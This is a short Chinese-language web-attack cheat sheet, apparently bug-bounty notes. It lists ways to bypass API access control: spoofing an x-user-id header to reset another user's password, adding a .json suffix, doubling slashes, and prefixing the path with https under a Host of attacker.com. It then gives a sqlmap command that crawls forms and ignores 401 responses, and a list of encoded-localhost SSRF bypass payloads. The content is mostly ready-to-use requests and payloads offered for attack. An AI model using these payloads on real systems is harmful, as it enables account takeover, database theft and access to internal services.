越权
1.利用 x-user-id
正常访问:GET /api/users/1337 -->401客户端错误
越权访问:GET /api/users/ x-user-id: 1337 -->200 Ok
利用方式:POST /api/users/自己id值/password-reset x-user-id: 别人id值
password-reset: 密码重置
原理:x-user-id可以让服务器读取这个特定的标头的值,由此使用内部变量来进行身份验证从而达到越权效果(由于API在处理带有自定义头部(如 x-user-id)的请求时存在逻辑错误。例如,API 可能错误地假设带有此类头部的请求已经通过了某种形式的验证。)
2.id后面加.json
request:
GET /api/users/1337.json
response:
200 success
原理:在一些 Web 框架中,路由可能会根据后缀(如 .json
)的存在与否来不同地处理。如果权限在不同的路由中实现不一致,这可能导致特定路由变得更容易受到越权攻击。
3.url加双斜杠
正常访问:/api/6798556007/users --> 403
越权访问:/api/6798556007//users --> 200 OK
原理:同样路由解析漏洞
4.请求包加https
正常访问:
Request:
POST /user/password-reset/ HTTP 1.1
Host :http://attacker.com
Response:
403 , 404 : False
越权访问:
Request:
POST /https://user/password-reset/ HTTP 1.1
Host :http://attacker.com
Response:
200 , 302 : Success
password-reset: 密码重置
5.构造新的url
正常访问:Target/signup.php --> 401客户端错误
越权访问:Target/index.php?page=signup --> 200 OK
SQL注入
-
sqlmap -u http://xxxx.com --forms --crawl=2 --dbs --ignore-code=401
--forms 在目标URL上解析和测试表单
--crawl=2 从起始位置爬取的深度,这里为2
--dbs 获取数据库
--ignore-code=401 无视http状态码,这里无视401状态
原理:当我们正常访问页面状态码提示401的时候只是说明没有访问权限而不是404不存在页面,所以此时我们可以使用sqlmap的爬虫功能爬出来这个页面上的表单进行注入测试
附:
SSRF绕过
http://127.1/
http://0000::1:80/
http://[::]:80/
http://2130706433/
http://whitelisted@127.0.0.1
http://0x7f000001/
http://017700000001
http://0177.00.00.01